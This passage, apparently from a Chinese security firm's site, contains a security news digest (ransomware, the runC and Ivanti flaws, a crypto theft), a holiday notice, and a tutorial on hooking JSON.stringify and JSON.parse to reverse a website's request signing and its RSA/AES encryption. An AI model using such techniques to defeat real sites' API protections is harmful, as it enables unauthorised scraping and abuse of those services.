Service，从而将源代码暴露给公众。梅赛德斯-奔驰是一家著名的德国汽车、公共汽车和卡车制造商，以其丰富的创新历史、豪华的设计和顶级的制造质量而闻名。与许多现代汽车制造商一样，该品牌在其车辆和服务中使用软件，包括安全和控制系统、信息娱乐、自动驾驶、诊断和维护工 3、研究人员披露Trigona与Mimic勒索软件背后为同一攻击者 https://asec.ahnlab.com/en/61000/ 研究人员最近发现了Trigona勒索软件威胁行为者同时安装Mimic 勒索软件的一项新活动。与过去的案例一样，最近检测到的攻击以 MS-SQL 服务器为目标，并因在恶意软件安装过程中利用MS-SQL 服务器中的批量复制程序 (BCP)实用程序而引人注目。Trigona 勒索软件已知至少自 2022 年 6 月以来一直活跃，通常针对 MS-SQL 服务器进行攻击，并且仍然处于活动状态。Mimic勒索软件首次发现于2022年6月，2024年1 月，研究人员发现威胁行为者同样了攻击管理不善的MS-SQL服务器并安装Mimic的案例 4、Tor 代码审计中发现了十多个漏洞 https://www.securityweek.com/tor-code-audit-finds-17-vulnerabilities/ Tor 审计中发现了十多个漏洞，其中包括一个可被用来注入任意网桥的高风险漏洞。 5、RunC 漏洞可导致容器逃逸获取宿主机访问权限 https://thehackernews.com/2024/02/runc-flaws-enable-container-escapes.html runC 命令行工具中已披露多个安全漏洞，威胁者可利用这些漏洞逃离容器的边界并发起后续攻击。 6、Ripple 联合创始人被盗价值约 1.12 亿美元的 XRP https://securityaffairs.com/158420/cyber-crime/crooks-stole-112m-ripple.html 骗子从 Ripple 联合创始人 Chris Larsen 的加密钱包中窃取了价值约 1.12 亿美元的 Ripple XRP。 7、Ivanti 警告称存在新的被积极利用的零日漏洞 https://securityaffairs.com/158403/hacking/ivanti-actively-exploited-zero-day-cve-2024-21893.html Ivanti 警告其 Connect Secure 和 Policy Secure 产品中存在两个新漏洞，其中之一已被广泛利用 8、 报告：关基保护市场未来十年将保持强劲增长 http://www.anquan419.com/knews/24/6600.html 报告指出，2023年，关键基础设施保护市场的收入超过1400亿美元，由于关基设施的重要性，报告预计未来十年该市场将一直保持强劲增长态势。 9、因受害者拒绝支付，勒索软件的赎金支付率降历史最低 https://www.bleepingcomputer.com/news/security/ransomware-payments-drop-to-record-low-as-victims-refuse-to-pay/ Coveware研究发现，即便在遭受网络攻击且数据被盗的情况下，上一季度的赎金支付率也仅为26%。不仅支付勒索软件赎金的受害者数量减少，实际支付的赎金金额也有所下降。 10、研究人员发现新的大规模恐吓软件和 PUP 传播活动 Unit 42 研究人员发现了一个我们称之为 ApateWeb 的大规模活动，该活动使用超过 130,000 个域的网络来传播恐吓软件、隐匿垃圾程序 (PUP) 和其他诈骗页面。在这些 PUP 中，发现了多个广告软件程序，包括流氓浏览器和不同的浏览器扩展。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

尊敬的客户伙伴： 2024年龙年春节来临，蚁景科技将于2024年2月8日至2月17日放假，共10天，2月18日复工；春节假期期间蚁景网安实验室将正常运营，若您遇到紧急事项，可联系4006-123-731。 感谢客户伙伴一直以来对我们的支持与厚爱， 新的一年，我们将全力以赴，继续为客户伙伴提供更优质的服务！ 祝愿大家新年快乐、龍光焕发、龍年龘吉、万事兴龍！

1.抓包： 发现url：https://api.xxxxxxx.cn/front/record/activity/search 请求头三处加密,requestId、sign(疑似md5)、timestamp(时间戳) 表单数据加密: 请求返回数据加密: 2.分析: 通过抓包，发现请求头、表单、返回的数据均有加密，如果你逆向的网站比较多会发现，一般加密的地方都在一起，网站大概率会使用JSON.stringify，来将数据转换为json字符串之后再进行加密，因此可以使用hook断点 hook JSON.stringify代码： (function() {    var stringify = JSON.stringify;    JSON.stringify = function(params) {        console.log("Hook JSON.stringify ——> ", params);        debugger;        return stringify(params);   } })(); 将hook代码注入控制台，翻页断点： 找到上一个栈： 可以看出RequestId是由getUuid生成： sign由MD5(e + d + c)生成： timestamp由Date.parse(new Date())生成： 发现表单是使用RSA加密，并且用setPublicKey方法设置了要使用的公钥。然后，使用encryptUnicodeLong方法对参数e进行加密。 使用hook JSON.parse找到返回数据解密位置，和上面hook代码一样的操作： (function() {    var parse = JSON.parse;    JSON.parse = function(params) {        console.log("Hook JSON.parse ——> ", params);        debugger;        return parse(params);   } })(); 找到解密位置： 跟进后，发现解密代码由AES解密： 3.扣代码: 将js代码复制下来，平且补全代码